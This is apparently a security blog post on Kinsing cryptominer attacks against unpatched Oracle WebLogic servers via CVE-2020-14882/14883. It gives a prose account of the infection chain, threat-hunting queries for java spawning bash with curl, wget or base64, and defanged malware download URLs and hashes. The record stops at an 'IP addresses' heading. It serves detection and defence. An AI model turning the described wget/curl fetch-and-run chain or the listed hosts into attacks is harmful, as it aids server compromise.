Coinminers Abusing WebLogic Vulnerabilities

Recently security researchers found malicious actors exploiting old and recently disclosed Oracle Weblogic Server vulnerabilities to deliver the crypto miner malware on the infected hosts. Mostly the Oracle Weblogic Servers are used for developing and deploying high-traffic enterprise applications in cloud environments.

Old vulnerabilities that are being widely exploited by malicious actors are CVE-2020-14882, which is remote code execution (RCE) vulnerability that takes advantage of improper input validation in the Oracle Web logic server.

In this blog, researchers are talking about the malware called Kinsing malware exploiting this Oracle Weblogic server. However, they also observed the download of Python Scripts and Shell went through the list of actions such as disabling OS security features, watchdog timers, iptables and finally disabling cloud service provider agents.

Technical Analysis of vulnerability being exploited widely

Malicious actors are abusing the old vulnerability CVE-2020-14882 found actively weaponizing to gain access to infected Organizations. We will see a step-by-step analysis of how the vulnerability is being exploited.

Step 1: Attacker runs scripts abusing CVE-2020-14882 and CVE-2020-14883 Vulnerabilities on Unpatched Oracle WebLogic servers.

Step 2: When the scripts are executed on the infected system java process executes 3 child processes which initiate 3 different executions, such as Wget/curl, Install kinsing malware, and C&C.

Step 3: When Wget/Curl executes and installs the Kinsing malware on the infected system and then disables the Firewall / Changes the firewall policy.

Step 4: Installed Kinsing malware connects to C&C servers and malware installed maintains persistence by adding a cronjob on the infected system.

Like Other malware, Cryptocurrency malware will start removing or killing the other miner processes running within the infected systems. And it would also remove the docker images which belonged to other crypto mining malware from the system. And malware disables the security features on the infected hosts so that critical file attributes can be modified and manipulated. After all these steps the script executes and kinsing malware downloads. Finally, it would download the malware binaries and then create a cronjob to download the wb.sh/script. 

Detection of Weblogic Vulnerability exploitation

Few Threat Hunting queries 

Hunt for potential malicious activity within the environment by following the below queries,

1. To hunt for potential misuse of java application by checking for processFilePath:/bin/java AND objectFilePath:/usr/bin/bash. 
2. Hunt the use of curl or wget initiated by Java via bash: processFilePath:/bin/java AND objectFilePath:/usr/bin/bash AND (objectCmd:curl or objectCmd:wget). 
3. Hunt for the execution of Base64-decoded string execution by Java via bash: processFilePath:/bin/java AND objectFilePath:/usr/bin/bash AND objectCmd:base64. 

Indicators of Compromise (IOCs)

URLs:

· hxxp://91[.]241[.]19[.]134/wb.sh

· hxxp://185[.]14[.]30[.]35/kinsing

· hxxp://185[.]14[.]30[.]35/wb.sh

· hxxp://195[.]2[.]79[.]26/kinsing

· hxxp://195[.]2[.]79[.]26/wb.sh

· hxxp://195[.]2[.]78[.]230/wb.sh

· hxxp://193[.]178[.]170[.]47/wb.sh

· hxxp://178[.]20[.]40[.]200/wb.sh

· hxxp://94[.]103[.]89[.]159/wb.sh

· hxxp://185[.]231[.]153[.]4/wb.sh

· hxxp://195[.]2[.]85[.]171/wb.sh

· hxxp://80[.]92[.]204[.]82/wb.sh

· hxxp://195[.]2[.]84[.]209/kinsing

· hxxp://193[.]178[.]170[.]47/kinsing

· hxxp://178[.]20[.]40[.]200/kinsing

File Hashes

020c14b7bf5ff410ea12226f9ca070540bd46eff80cf20416871143464f7d546 – Trojan.SH.CVE20207961.SM

5D2530B809FD069F97B30A5938D471DD2145341B5793A70656AAD6045445CF6D- Trojan.Linux.KINSING.USELVCR22 

IP addresses